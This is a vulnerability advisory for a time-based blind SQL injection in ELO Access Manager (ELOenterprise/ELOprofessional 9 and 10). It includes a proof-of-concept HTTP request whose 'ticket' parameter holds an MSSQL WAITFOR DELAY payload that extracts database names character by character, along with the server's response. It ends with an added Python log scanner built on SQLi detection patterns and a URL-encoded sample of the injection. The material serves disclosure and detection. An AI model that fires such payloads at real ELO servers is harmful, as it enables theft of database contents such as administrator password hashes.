# Title: Elektronischer Leitz-Ordner 10 - SQL Injection
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
# Software: https://www.elo.com/en-de/
# CVE: N/A
# Affected Products:
# ELOenterprise 10 (ELO Access Manager <= 10.17.120)
# ELOenterprise 9 (ELO Access Manager <= 9.17.120)
# ELOprofessional 10 (ELO Access Manager <= 10.17.120)
# ELOprofessional 9 (ELO Access Manager <= 9.17.120)

# Description:
# ELO is a commercial software product for managing documents and
# electronic content. Storage and organization are similar to classic
# paper-based document management. ELO belongs to the category of document
# management systems (DMS) and enterprise content management systems (ECM).
# DMS and ECM systems enable audit-proof archiving of documents and
# information requiring storage.
#
# We have discovered a time-based blind SQL injection vulnerability in the
# ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
# it possible to read all database content. The vulnerability exists in
# the HTTP GET parameter "ticket". For example, we succeeded in reading
# the password hash of the administrator user in the "userdata" table from
# the "eloam" database.

# Proof of Concept:

GET /wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY name),5,1))>104) WAITFOR DELAY '0:0:1'--qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
Host: server:9090
Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101 Firefox/59.0

HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 410
Date: Fri, 06 Apr 2018 11:57:15 GMT
Connection: close

{"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027 IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung ungültig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}
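A defender-side check, added here and not part of the advisory or of ELO's own code: it walks access-log request lines for the aggregation endpoint named above and flags any "ticket" value that fails a strict allowlist or carries the time-based markers seen in the PoC. The alphanumeric ticket format and the sample request lines are constructed assumptions.

```python
# Added example: flag requests whose "ticket" parameter looks like the
# time-based blind SQL injection in the advisory. Sample lines are constructed.
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate ELO ticket is one alphanumeric token (the PoC
# shows a 32+ character one). Anything else is suspicious even without
# SQL keywords, so the allowlist catches evasions the marker list misses.
TICKET_OK = re.compile(r"[A-Za-z0-9]{8,64}")

# Time-delay primitives for MSSQL (used in the PoC), MySQL and PostgreSQL,
# plus the quote-then-keyword and comment patterns the PoC payload uses.
SQLI_MARKERS = re.compile(
    r"WAITFOR\s+DELAY|SLEEP\s*\(|PG_SLEEP\s*\(|BENCHMARK\s*\(|"
    r"sysdatabases|--|'\s*(?:IF|OR|AND)\b",
    re.IGNORECASE,
)

def inspect_request_line(request_line: str) -> Optional[dict]:
    """Return a finding for one HTTP request line, or None if it looks benign."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None  # not a request line
    parts = urlsplit(target)
    if "/social/api/feed/aggregation/" not in parts.path:
        return None  # only the endpoint named in the advisory is in scope
    # parse_qs percent-decodes and turns '+' into spaces, as the server does.
    ticket = parse_qs(parts.query, keep_blank_values=True).get("ticket", [""])[0]
    if TICKET_OK.fullmatch(ticket):
        return None
    markers = sorted({m.upper() for m in SQLI_MARKERS.findall(ticket)})
    return {"path": parts.path, "ticket": ticket[:80], "markers": markers}

def scan(request_lines):
    return [f for f in map(inspect_request_line, request_lines) if f]

SAMPLE_LOG = [  # constructed: benign, PoC-style injection, allowlist violation
    "GET /wf-NAME/social/api/feed/aggregation/201803310000"
    "?ticket=A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6&after=1523013041889&lang=de HTTP/1.1",
    "GET /wf-NAME/social/api/feed/aggregation/201803310000"
    "?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%27+IF(UNICODE(SUBSTRING((SELECT+TOP+1+name"
    "+FROM+master..sysdatabases),5,1))%3E104)+WAITFOR+DELAY+%270:0:1%27--qvAV"
    "&after=1523013041889&lang=de HTTP/1.1",
    "GET /wf-NAME/social/api/feed/aggregation/201803310000?ticket=abc%20def HTTP/1.1",
]
```

An empty marker list on a flagged line means the ticket merely broke the allowlist; a non-empty one is worth correlating with unusually slow responses from the same client.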